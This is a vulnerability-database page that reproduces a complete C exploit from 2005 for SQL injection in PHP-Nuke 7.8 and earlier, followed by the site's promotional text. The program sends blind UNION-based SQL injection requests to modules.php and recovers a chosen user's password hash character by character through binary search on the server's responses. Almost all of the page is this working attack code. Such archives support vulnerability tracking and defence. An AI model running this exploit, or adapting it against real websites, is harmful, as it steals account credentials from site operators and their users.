Vulners
Lucene search
PHP-Nuke <= 7.8 (modules.php) SQL Injection Exploit
/***********************************************
* PHP-Nuke <=7.8 SQL injection exploit
* need MySQL > 4.0
* (c)oded by 1dt.w0lf
* RST/GHC
* http://rst.void.ru
* http://ghc.ru
************************************************/
// tested on 7.8
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <regex.h>
#define START 47
#define END 103
#define SZ 1024
#define PORT 80
#define PREFIX "nuke_"
#define SQL "name=PHP-Nuke%%207.8%%20Exploit'%%20UNION%%20SELECT%%201,1%%20FROM%%20%susers%%20WHERE%%20user_id=%d%%20AND%%20ascii(substring(user_password,%d,1))%c%d/*"
main (int argc, char **argv) {
int pos;
int res = 0;
char result[33];
if(argc<4)
{
printf("Usage %s [host] [/folder/] [user_id]\n",argv[0]);
exit(1);
}
printf("PHP-Nuke <= 7.8 SQL injection exploit\n"
"-------------------------------------\n"
"[~] Host : %s\n[~] Folder: %s\n"
"[!] Searching password for user with id : %d\n"
"[!] Please wait...\n",argv[1],argv[2],atoi(argv[3]));
for(pos=1;pos<33;pos++)
{
found(argv[1],argv[2],atoi(argv[3]),START,END,pos,&res);
sprintf(result+pos-1,"%c",res);
if(res == 0) { break; }
}
result[33] = '\0';
if(strlen(result)>0) printf("[+] Password: %s\n",result);
else printf("[-] Password not found\n");
exit (0);
}
int found(char * host, char * folder, int user_id, int min, int max, int pos, int * res)
{
int i;
int sr = (max - ((max-min)/2));
if( (max-min) < 6 ) { i=(brute(host,folder,user_id,min,max,pos)); *res = i; }
else if( (check(host,folder,pos,'>',sr,user_id)) == 1 ) { found(host,folder,user_id,sr,max,pos,res); }
else { found(host,folder,user_id,min,sr,pos,res); }
return 0;
}
int brute(char * host, char * folder, int user_id, int min, int max, int pos)
{
int i;
for(i=min-1;i<max+1;i++)
{
if((check(host,folder,pos,'=',i, user_id)) == 1) { return i; }
}
return 0;
}
int check(char * host, char * folder, int pos, int chk, int test, int user_id)
{
char req[SZ];
char ans[SZ];
char sql[SZ];
int sock;
struct hostent *hp;
struct sockaddr_in sin;
regex_t re;
char *pattern = "Sorry, this Module isn't active!";
if( (sock = socket (AF_INET, SOCK_STREAM, 0)) < 0 )
{
printf("[ ERROR ] Can't create socket!\n");
exit(1);
}
if( (regcomp( &re, pattern, REG_EXTENDED )) != 0 )
{
printf("[ ERROR ] REG ERROR!\n");
exit(1);
}
bzero(&sin, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(PORT);
hp = gethostbyname (host);
memcpy ((char *)&sin.sin_addr,hp->h_addr,hp->h_length);
connect (sock, (struct sockaddr *)&sin, sizeof(sin));
bzero(req,sizeof(req));
bzero(ans,sizeof(ans));
bzero(sql,sizeof(sql));
snprintf(sql,SZ-1,SQL,PREFIX,user_id,pos,chk,test);
snprintf(req,SZ-1,"POST %smodules.php HTTP/1.0\n"
"Host: %s\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"%s\n\n\n",
folder,
host,
strlen(sql),
sql);
write(sock, req, strlen(req));
while( (read(sock, &ans, SZ-1)) > 0 )
{
if( (regexec( &re, ans, 0, NULL, 0)) == 0) { return 0; }
bzero(ans,sizeof(ans));
}
close (sock);
return 1;
}
// milw0rm.com [2005-09-16]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1